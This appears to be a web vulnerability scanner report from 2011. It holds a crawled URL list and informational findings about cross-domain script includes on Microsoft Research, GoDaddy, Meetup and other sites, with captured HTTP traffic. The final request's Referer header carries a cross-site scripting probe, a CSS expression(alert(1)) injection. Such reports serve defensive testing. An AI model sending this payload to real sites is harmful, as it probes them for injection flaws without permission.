http://research.microsoft.com/en-us/about/brochure-7.aspx
http://research.microsoft.com/en-us/about/brochure-8.aspx
http://research.microsoft.com/en-us/about/brochure-9.aspx
http://research.microsoft.com/en-us/about/contactus.aspx
http://research.microsoft.com/en-us/about/default.aspx
http://research.microsoft.com/en-us/about/directors.aspx
http://research.microsoft.com/en-us/about/feature/downloads.aspx
http://research.microsoft.com/en-us/about/paperawards.aspx
http://research.microsoft.com/en-us/collaboration/about/default.aspx
http://research.microsoft.com/en-us/collaboration/about/events.aspx
http://research.microsoft.com/en-us/collaboration/about/projects.aspx
http://research.microsoft.com/en-us/collaboration/about/summits.aspx
http://research.microsoft.com/en-us/collaboration/awards/default.aspx
http://research.microsoft.com/en-us/collaboration/awards/fellows-women.aspx
http://research.microsoft.com/en-us/collaboration/awards/fellowships.aspx
http://research.microsoft.com/en-us/collaboration/awards/opportunities.aspx
http://research.microsoft.com/en-us/collaboration/bg_txt.png
http://research.microsoft.com/en-us/collaboration/default.aspx
http://research.microsoft.com/en-us/collaboration/focus/cs/default.aspx
http://research.microsoft.com/en-us/collaboration/focus/e3/default.aspx
http://research.microsoft.com/en-us/collaboration/focus/education/default.aspx
http://research.microsoft.com/en-us/collaboration/focus/escience/default.aspx
http://research.microsoft.com/en-us/collaboration/focus/health/default.aspx
http://research.microsoft.com/en-us/collaboration/focus/nui/default.aspx
http://research.microsoft.com/en-us/collaboration/global/asia-pacific/default.aspx
http://research.microsoft.com/en-us/collaboration/global/asia-pacific/talent/awards-asia-pacific.aspx
http://research.microsoft.com/en-us/collaboration/global/asia-pacific/talent/mstc.aspx
http://research.microsoft.com/en-us/collaboration/global/europe/default.aspx
http://research.microsoft.com/en-us/collaboration/global/europe/europe-awards.aspx
http://research.microsoft.com/en-us/collaboration/global/india/default.aspx
http://research.microsoft.com/en-us/collaboration/global/india/india-awards.aspx
http://research.microsoft.com/en-us/collaboration/global/india/phdfellowships.aspx
http://research.microsoft.com/en-us/collaboration/global/latam/default.aspx
http://research.microsoft.com/en-us/collaboration/global/latam/latam-awards.aspx
http://research.microsoft.com/en-us/collaboration/global/me-africa/default.aspx
http://research.microsoft.com/en-us/collaboration/global/northam/default.aspx
http://research.microsoft.com/en-us/collaboration/global/northam/northam-awards.aspx
http://research.microsoft.com/en-us/collaboration/institutes/default.aspx
http://research.microsoft.com/en-us/collaboration/tools/default.aspx
http://research.microsoft.com/en-us/community/default.aspx
http://research.microsoft.com/en-us/default.aspx
http://research.microsoft.com/en-us/events/escience2011/
http://research.microsoft.com/en-us/events/indiaschooljune2011/
http://research.microsoft.com/en-us/events/women-in-computing2011/
http://research.microsoft.com/en-us/jobs/default.aspx
http://research.microsoft.com/en-us/jobs/fulltime/default.aspx
http://research.microsoft.com/en-us/jobs/fulltime/researcher.aspx
http://research.microsoft.com/en-us/jobs/intern/about_asia-pacific.aspx
http://research.microsoft.com/en-us/jobs/intern/about_ca.aspx
http://research.microsoft.com/en-us/jobs/intern/about_india.aspx
http://research.microsoft.com/en-us/jobs/intern/about_uk.aspx
http://research.microsoft.com/en-us/jobs/intern/about_wa.aspx
http://research.microsoft.com/en-us/jobs/intern/cmic.aspx
http://research.microsoft.com/en-us/jobs/intern/default.aspx
http://research.microsoft.com/en-us/jobs/intern/russia.aspx
http://research.microsoft.com/en-us/labs/asia/default.aspx
http://research.microsoft.com/en-us/labs/cambridge/default.aspx
http://research.microsoft.com/en-us/labs/cmic/default.aspx
http://research.microsoft.com/en-us/labs/default.aspx
http://research.microsoft.com/en-us/labs/emic/default.aspx
http://research.microsoft.com/en-us/labs/fuse/default.aspx
http://research.microsoft.com/en-us/labs/ilabs/default.aspx
http://research.microsoft.com/en-us/labs/india/default.aspx
http://research.microsoft.com/en-us/labs/newengland/
http://research.microsoft.com/en-us/labs/newengland/default.aspx
http://research.microsoft.com/en-us/labs/redmond/default.aspx
http://research.microsoft.com/en-us/labs/siliconvalley/default.aspx
http://research.microsoft.com/en-us/labs/xcg/default.aspx
http://research.microsoft.com/en-us/news/features/2010interns-081610.aspx
http://research.microsoft.com/en-us/news/features/hoare-080411.aspx
http://research.microsoft.com/en-us/news/features/interns-080309.aspx
http://research.microsoft.com/en-us/news/features/interns2011-082511.aspx
http://research.microsoft.com/en-us/news/features/phillipstr35-082311.aspx
http://research.microsoft.com/en-us/news/features/siggraph2011awards.aspx
http://research.microsoft.com/en-us/news/features/speechrecognition-082911.aspx
http://research.microsoft.com/en-us/news/headlines/2011womenscholarships-012811.aspx
http://research.microsoft.com/en-us/news/headlines/ibukaaward-081511.aspx
http://research.microsoft.com/en-us/people/abadi/default.aspx
http://research.microsoft.com/en-us/people/adiamant/default.aspx
http://research.microsoft.com/en-us/people/ajbrush/default.aspx
http://research.microsoft.com/en-us/people/akashl/
http://research.microsoft.com/en-us/people/alecw/
http://research.microsoft.com/en-us/people/alexac/default.aspx
http://research.microsoft.com/en-us/people/aphillip/
http://research.microsoft.com/en-us/people/aproutie/
http://research.microsoft.com/en-us/people/aratan/default.aspx
http://research.microsoft.com/en-us/people/asellen/
http://research.microsoft.com/en-us/people/asellen/default.aspx
http://research.microsoft.com/en-us/people/bainguo/default.aspx
http://research.microsoft.com/en-us/people/bibuxton/default.aspx
http://research.microsoft.com/en-us/people/birrell/default.aspx
http://research.microsoft.com/en-us/people/blinn/default.aspx
http://research.microsoft.com/en-us/people/bycook/default.aspx
http://research.microsoft.com/en-us/people/cthacker/default.aspx
http://research.microsoft.com/en-us/people/dburger/
http://research.microsoft.com/en-us/people/dburger/default.aspx
http://research.microsoft.com/en-us/people/deng/default.aspx
http://research.microsoft.com/en-us/people/dmb/
http://research.microsoft.com/en-us/people/dmb/default.aspx
http://research.microsoft.com/en-us/people/dwork/
http://research.microsoft.com/en-us/people/gbell/default.aspx
http://research.microsoft.com/en-us/people/ggr/default.aspx
http://research.microsoft.com/en-us/people/goldberg/default.aspx
http://research.microsoft.com/en-us/people/grama/default.aspx
http://research.microsoft.com/en-us/people/gray/
http://research.microsoft.com/en-us/people/gray/default.aspx
http://research.microsoft.com/en-us/people/hon/default.aspx
http://research.microsoft.com/en-us/people/horvitz/default.aspx
http://research.microsoft.com/en-us/people/hsalama/default.aspx
http://research.microsoft.com/en-us/people/hshum/default.aspx
http://research.microsoft.com/en-us/people/indranim/
http://research.microsoft.com/en-us/people/jamiesho/
http://research.microsoft.com/en-us/people/jbishop/default.aspx
http://research.microsoft.com/en-us/people/jiansun/default.aspx
http://research.microsoft.com/en-us/people/johndo/default.aspx
http://research.microsoft.com/en-us/people/jplatt/default.aspx
http://research.microsoft.com/en-us/people/jtw/default.aspx
http://research.microsoft.com/en-us/people/krw/default.aspx
http://research.microsoft.com/en-us/people/kstrauss/
http://research.microsoft.com/en-us/people/larus/default.aspx
http://research.microsoft.com/en-us/people/lilich/
http://research.microsoft.com/en-us/people/lilich/default.aspx
http://research.microsoft.com/en-us/people/lintaoz/default.aspx
http://research.microsoft.com/en-us/people/liuj/default.aspx
http://research.microsoft.com/en-us/people/lomet/default.aspx
http://research.microsoft.com/en-us/people/luca/default.aspx
http://research.microsoft.com/en-us/people/malvar/
http://research.microsoft.com/en-us/people/malvar/default.aspx
http://research.microsoft.com/en-us/people/manuelc/default.aspx
http://research.microsoft.com/en-us/people/marycz/default.aspx
http://research.microsoft.com/en-us/people/mds/
http://research.microsoft.com/en-us/people/mds/default.aspx
http://research.microsoft.com/en-us/people/milanv/
http://research.microsoft.com/en-us/people/milanv/default.aspx
http://research.microsoft.com/en-us/people/mzh/
http://research.microsoft.com/en-us/people/najork/default.aspx
http://research.microsoft.com/en-us/people/pachou/default.aspx
http://research.microsoft.com/en-us/people/padmanab/default.aspx
http://research.microsoft.com/en-us/people/palarson/default.aspx
http://research.microsoft.com/en-us/people/parno/
http://research.microsoft.com/en-us/people/philbe/
http://research.microsoft.com/en-us/people/philbe/default.aspx
http://research.microsoft.com/en-us/people/ramjee/
http://research.microsoft.com/en-us/people/ranveer/default.aspx
http://research.microsoft.com/en-us/people/rashid/default.aspx
http://research.microsoft.com/en-us/people/richdr/default.aspx
http://research.microsoft.com/en-us/people/robertson/default.aspx
http://research.microsoft.com/en-us/people/roylevin/
http://research.microsoft.com/en-us/people/sdumais/default.aspx
http://research.microsoft.com/en-us/people/shuvendu/default.aspx
http://research.microsoft.com/en-us/people/simonpj/
http://research.microsoft.com/en-us/people/simonpj/default.aspx
http://research.microsoft.com/en-us/people/spli/
http://research.microsoft.com/en-us/people/surajitc/
http://research.microsoft.com/en-us/people/surajitc/default.aspx
http://research.microsoft.com/en-us/people/terry/default.aspx
http://research.microsoft.com/en-us/people/thekkath/default.aspx
http://research.microsoft.com/en-us/people/thoare/
http://research.microsoft.com/en-us/people/thoare/default.aspx
http://research.microsoft.com/en-us/people/tonyhey/default.aspx
http://research.microsoft.com/en-us/people/tsharp/
http://research.microsoft.com/en-us/people/wenwuzhu/default.aspx
http://research.microsoft.com/en-us/people/wobber/default.aspx
http://research.microsoft.com/en-us/people/wong/default.aspx
http://research.microsoft.com/en-us/people/wyma/
http://research.microsoft.com/en-us/people/zhao/default.aspx
http://research.microsoft.com/en-us/press/ablake.aspx
http://research.microsoft.com/en-us/press/anandan.aspx
http://research.microsoft.com/en-us/press/bainguo.aspx
http://research.microsoft.com/en-us/press/borgs.aspx
http://research.microsoft.com/en-us/press/cmbishop.aspx
http://research.microsoft.com/en-us/press/default.aspx
http://research.microsoft.com/en-us/press/fastfacts.aspx
http://research.microsoft.com/en-us/press/hon.aspx
http://research.microsoft.com/en-us/press/jchayes.aspx
http://research.microsoft.com/en-us/press/kevinsch.aspx
http://research.microsoft.com/en-us/press/kwood.aspx
http://research.microsoft.com/en-us/press/malvar.aspx
http://research.microsoft.com/en-us/press/mds.aspx
http://research.microsoft.com/en-us/press/overview.aspx
http://research.microsoft.com/en-us/press/rajamani.aspx
http://research.microsoft.com/en-us/press/roylevin.aspx
http://research.microsoft.com/en-us/press/telabbady.aspx
http://research.microsoft.com/en-us/projects/chem4word/default.aspx
http://research.microsoft.com/en-us/projects/creativecommons/default.aspx
http://research.microsoft.com/en-us/projects/csec/
http://research.microsoft.com/en-us/projects/nodexl/
http://research.microsoft.com/en-us/projects/researchgames/
http://research.microsoft.com/en-us/projects/serviceos/
http://research.microsoft.com/en-us/projects/wwt/contest.aspx
http://research.microsoft.com/en-us/projects/wwt/default.aspx
http://research.microsoft.com/en-us/research/default.aspx
http://research.microsoft.com/en-us/um/people/awf/
http://research.microsoft.com/en-us/um/people/bahl/
http://research.microsoft.com/en-us/um/people/borgs/
http://research.microsoft.com/en-us/um/people/jchayes/
http://research.microsoft.com/en-us/um/people/szeliski/
http://research.microsoft.com/en-us/um/redmond/about/timeline/
http://research.microsoft.com/en-us/um/redmond/projects/kinectsdk/
http://research.microsoft.com/en-us/um/redmond/projects/kinectsdk/download.aspx
http://research.microsoft.com/feedGen/
http://research.microsoft.com/nothing.html
http://social.expression.microsoft.com/Forums/ar-SA/wpf/thread/786f2813-de28-4eda-ba14-9910ce655dc6
http://social.expression.microsoft.com/Forums/da-DK/wpf/thread/16309d89-5f65-4e49-9ce5-38f2a466a2c0
http://vasco.com/company/contactus.aspx
http://vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx
http://vasco.com/favicon.ico
http://vasco.com/images/css/readmore_bg.gif
http://vasco.com/investor_relations/investor_press/investors_press.aspx
http://vasco.com/services/services.aspx
http://vasco.com/support/support_and_downloads.aspx
http://vasco.com/training/our_offering/elearning/certified_ethical_hacking.aspx
http://vasco.com/user_registration.aspx
http://vasco.com/verticals/appsecurity/online_application_security_overview.aspx
http://vasco.com/verticals/banking/onlinebanking.aspx
http://vasco.com/verticals/netsecurity/network_access_security.aspx
http://www.cheapssls.com/
http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html
http://www.cheapssls.com/geotrust-ssl-certificates/
http://www.cheapssls.com/geotrust-ssl-certificates/quickssl-premium.html
http://www.cheapssls.com/geotrust-ssl-certificates/quickssl.html
http://www.cheapssls.com/geotrust-ssl-certificates/rapidssl.html
http://www.cheapssls.com/index.php
https://www.cheapssls.com/
https://www.cheapssls.com/index.php
http://www.dotnetnuke.com/News/Press-Releases/HTTP-Compression-Module.aspx
http://www.dotnetnuke.com/Resources/Wiki/page/Compression.aspx
http://www.godaddy.com/Payment/payment-options.aspx
http://www.godaddy.com/affiliates/affiliate-program.aspx
http://www.godaddy.com/gdshop/offers/cross_sell.asp
http://www.godaddy.com/ssl/ssl-certificates.aspx
http://www.hostnj.net/
http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/
http://www.meetup.com/
http://www.meetup.com/Boston-BizSpark-Meetup/
http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/
http://www.meetup.com/sponsorships/
http://www.meetup.com/whats_new/
http://www.microcad.ca/
http://www.microcad.ca/cart
http://www.microcad.ca/customerservice/about
http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760
https://www.microcad.ca/auth/login
https://www.microcad.ca/checkout/address
http://www.microsoft-careers.com/find.job
http://www.microsoft-careers.com/job/Cambridge-Database-Administrator-TV-2FVideo-Advertising-Job-MA-02138/1394190/
http://www.microsoft-careers.com/job/Cambridge-Product-Planner,-Lead-APS-754562-Job-MA-02138/1248350/
http://www.microsoft-careers.com/job/Cambridge-Program-Manager-Interactive-Entertainment-Business-Job-MA-02138/1186137/
http://www.microsoft-careers.com/job/Cambridge-SDE-2C-Senior-763405-Job-MA-02138/1388917/
http://www.microsoft-careers.com/job/Cambridge-Software-Development-Engineer-in-Test-II-Office-365-Job-MA-02138/1289133/
http://www.microsoft-careers.com/job/Cambridge-Software-Test-Engineer-28SDET-29-II-Job-MA-02138/1383264/
http://www.microsoft-careers.com/job/Cambridge-System-Engineer-TV-2FVideo-Advertising-Job-MA-02138/1394205/
http://www.microsoft-careers.com/search
https://www.microsoft-careers.com/
https://www.microsoft-careers.com/content/corporate-research/
https://www.microsoft-careers.com/find.job
https://www.microsoft-careers.com/find.job
https://www.microsoft-careers.com/go/Microsoft-Research-Jobs/217358/
https://www.microsoft-careers.com/job/Redmond-Senior-Software-Development-Engineer-Job-WA-98052/1436711/
https://www.microsoft-careers.com/talentcommunity/subscribe/
http://www.omniture.com/en/
http://www.register.com/
http://www.register.com/domain/searchresults.rcmx
http://www.register.com/unauthenticated_session_expired.rcmx
https://www.sslmatrix.com/Order/quickorder
https://www.sslmatrix.com/ssl-promotion-code
https://www.sslmatrix.com/ssl-promotion-code/ssl-price
http://www.vasco.com/favicon.ico
http://www.vasco.com/images/css/readmore_bg.gif

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

18.1. http://assets.tumblr.com/iframe.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.tumblr.com
Path:	/iframe.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/ga.js

Request

Response

18.2. https://cart.godaddy.com/basket.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cart.godaddy.com
Path:	/basket.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.1.min.js
https://img3.wsimg.com/cart/script/cart_20110215.min.js
https://img3.wsimg.com/fastball/js_lib/FastballLibrary0005.js?version=1
https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js

Request

Response

18.3. http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://frankgruber.me
Path:	/post/9680693152/the-view-looking-out-from-techcocktail-boston-at

Issue detail

The response dynamically includes the following scripts from other domains:

http://assets.tumblr.com/javascript/tumblelog.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://s29.sitemeter.com/js/counter.js?site=s29fjgruber
http://static.tumblr.com/fftf9xi/D10lno1ii/modernizr-1.7.min.js
http://static.tumblr.com/fftf9xi/ZZzl81i16/jquery.min.js
http://static.tumblr.com/fftf9xi/xTHlp9jj0/functions.min.js
https://apis.google.com/js/plusone.js

Request

Response

HTTP/1.1 200 OK
P3P: CP="ALL ADM DEV PSAi COM OUR OTRo STP IND ONL"
X-Tumblr-User: frankgruber
Link: <http://tumblr.com/xli4g3mun4>; rel=shorturl
Link: <http://26.media.tumblr.com/avatar_eabd534edfe9_16.png>; rel=icon
Vary: Accept-Encoding
X-Tumblr-Usec: D=843918
Content-Type: text/html; charset=UTF-8
Content-Length: 79236
Date: Sat, 03 Sep 2011 13:15:05 GMT
Connection: close

<!doctype html>




   <script src="http://static.tumblr.com/fftf9xi/ZZzl81i16/jquery.min.js"></script>

   <script src="http://static.tumblr.com/fftf9xi/xTHlp9jj0/functions.min.js"></script>
   <script src="http://assets.tumblr.com/javascript/tumblelog.js" type="text/javascript"></script>
...[SNIP]...
</a>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

<script type="text/javascript" src="http://s29.sitemeter.com/js/counter.js?site=s29fjgruber">
</script>
...[SNIP]...
</noscript>

<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.4. http://geom2.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://geom2.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://code.jquery.com/jquery-1.4.2.min.js

Request

GET / HTTP/1.1
Host: geom2.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Community/CommittedtoCambridge/tabid/338/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:15:07 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 01 Sep 2011 14:33:27 GMT
ETag: "8fc0e5-89dc-4abe220bc1bc0"
Accept-Ranges: bytes
Content-Length: 35292
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
<link rel="stylesheet" type="text/css" href="v2/css/styles.css" />
<script src="http://code.jquery.com/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...

18.5. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js

Request

Response

18.6. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/sma8.js

Request

Response

18.7. https://idp.godaddy.com/login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idp.godaddy.com
Path:	/login.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.1.min.js
https://img3.wsimg.com/idp/script/Fastball_Lib.js?version=1
https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js

Request

Response

18.8. https://idp.godaddy.com/retrieveaccount.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idp.godaddy.com
Path:	/retrieveaccount.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.1.min.js
https://img3.wsimg.com/idp/script/Fastball_Lib.js?version=1
https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js

Request

Response

18.9. http://meetupblog.meetup.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://meetupblog.meetup.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/~s/meetup?i=http%3A%2F%2Fmeetupblog.meetup.com%2F2011%2F07%2Fupdates-to-meetup-announcements.html
http://feeds.feedburner.com/~s/meetup?i=http%3A%2F%2Fmeetupblog.meetup.com%2F2011%2F08%2Fdrawing-in-real-life.html
http://feeds.feedburner.com/~s/meetup?i=http%3A%2F%2Fmeetupblog.meetup.com%2F2011%2F08%2Fhikingtips.html
http://feeds.feedburner.com/~s/meetup?i=http%3A%2F%2Fmeetupblog.meetup.com%2F2011%2F08%2Fnew-feature-learn-more-about-meetup-attendees.html
http://feeds.feedburner.com/~s/meetup?i=http%3A%2F%2Fmeetupblog.meetup.com%2F2011%2F08%2Fnew-place-to-run.html
http://feeds.feedburner.com/~s/meetup?i=http%3A%2F%2Fmeetupblog.meetup.com%2F2011%2F08%2Fpaws-for-a-cause.html
http://feeds.feedburner.com/~s/meetup?i=http%3A%2F%2Fmeetupblog.meetup.com%2F2011%2F08%2Framdan-iftar.html
http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a70a804070ddf37
http://static.typepad.com/.shared:v20110901.01-0-gd23af7e:typepad:en_us/js/yui/yahoo-dom-event.js,/js/app/thumbnail-gallery-min.js,/js/sixatrack-loader.js
https://apis.google.com/js/plusone.js

Request

GET / HTTP/1.1
Host: meetupblog.meetup.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MEETUP_MEMBER=id=0&status=1&timestamp=1315055493&bs=0&tz=US%2FEastern&zip=&country=us&city=&state=&lat=0.0&lon=0.0&domain=&dc=&s=88f912a4b3d9f96f4f99f1d5b0e82fe99809932d; MEETUP_AFFIL=affil=meetup&ref=microsoftcambridge.com/events/bostonbizsparkmeetupseptember2011/tabid/879; MEETUP_LANGUAGE=language=en&country=US; trax_ghrollout#1535927=uuid=45bfb8e4-26a5-4d03-bfc0-39f3ea7ec8d0&v=new&p=ghome&s=0&_=cf8b24; MEETUP_GA=id%3D0%26segment%3Dalien%26rg%3Dperksfooter; __utma=19434532.1405489551.1315055535.1315055535.1315055535.1; __utmb=19434532.20.10.1315055535; __utmc=19434532; __utmz=19434532.1315055535.1.1.utmcsr=microsoftcambridge.com|utmccn=(referral)|utmcmd=referral|utmcct=/Events/BostonBizSparkMeetupSeptember2011/tabid/879/Default.aspx; __utmv=19434532.id%3D0%26segment%3Dalien%26rg%3Dperksfooter

Response

HTTP/1.1 200 OK
Server: Apache
X-PhApp: oak-tp-web012
X-Webserver: oak-tp-web012
Vary: cookie
Keep-Alive: timeout=300, max=100
Content-Type: text/html; charset=utf-8
Content-Length: 39765
Date: Sat, 03 Sep 2011 13:12:23 GMT
X-Varnish: 1539754810 1539726163
Age: 25
Via: 1.1 varnish

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="typepad-standard" xmlns:fb="ht
...[SNIP]...
</script>
   <script type="text/javascript" src="http://static.typepad.com/.shared:v20110901.01-0-gd23af7e:typepad:en_us/js/yui/yahoo-dom-event.js,/js/app/thumbnail-gallery-min.js,/js/sixatrack-loader.js"></script>
...[SNIP]...
</div>
<script src="http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a70a804070ddf37" type="text/javascript"></script>
...[SNIP]...
</div>

                           <script src="http://feeds.feedburner.com/~s/meetup?i=http%3A%2F%2Fmeetupblog.meetup.com%2F2011%2F08%2Fnew-place-to-run.html" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a70a804070ddf37" type="text/javascript"></script>
...[SNIP]...
</div>

                           <script src="http://feeds.feedburner.com/~s/meetup?i=http%3A%2F%2Fmeetupblog.meetup.com%2F2011%2F08%2Framdan-iftar.html" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a70a804070ddf37" type="text/javascript"></script>
...[SNIP]...
</div>

                           <script src="http://feeds.feedburner.com/~s/meetup?i=http%3A%2F%2Fmeetupblog.meetup.com%2F2011%2F08%2Fdrawing-in-real-life.html" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a70a804070ddf37" type="text/javascript"></script>
...[SNIP]...
</div>

                           <script src="http://feeds.feedburner.com/~s/meetup?i=http%3A%2F%2Fmeetupblog.meetup.com%2F2011%2F08%2Fhikingtips.html" type="text/javascript"></script>
...[SNIP]...
</p>
<script src="http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a70a804070ddf37" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a70a804070ddf37" type="text/javascript"></script>
...[SNIP]...
</div>

                           <script src="http://feeds.feedburner.com/~s/meetup?i=http%3A%2F%2Fmeetupblog.meetup.com%2F2011%2F08%2Fpaws-for-a-cause.html" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a70a804070ddf37" type="text/javascript"></script>
...[SNIP]...
</div>

                           <script src="http://feeds.feedburner.com/~s/meetup?i=http%3A%2F%2Fmeetupblog.meetup.com%2F2011%2F08%2Fnew-feature-learn-more-about-meetup-attendees.html" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a70a804070ddf37" type="text/javascript"></script>
...[SNIP]...
</div>

                           <script src="http://feeds.feedburner.com/~s/meetup?i=http%3A%2F%2Fmeetupblog.meetup.com%2F2011%2F07%2Fupdates-to-meetup-announcements.html" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.10. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.register.com
Path:	/RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

Issue detail

The response dynamically includes the following script from another domain:

https://ad.doubleclick.net/adj/N553.register.com/B5118552.25;abr=!ie;sz=728x90;pc=[TPAS_ID];ord=1673054765?

Request

Response

18.11. http://research.microsoft.com/Search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/Search

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

Response

18.12. http://research.microsoft.com/apps/dp/areas.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/areas.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /apps/dp/areas.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.13. http://research.microsoft.com/apps/dp/blank.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/blank.jpg

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /apps/dp/blank.jpg HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/apps/dp/search.aspx?q=27b6a%22style%253d%22x+%253aexpression%28alert%281%29%29+%22d048afd9275&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
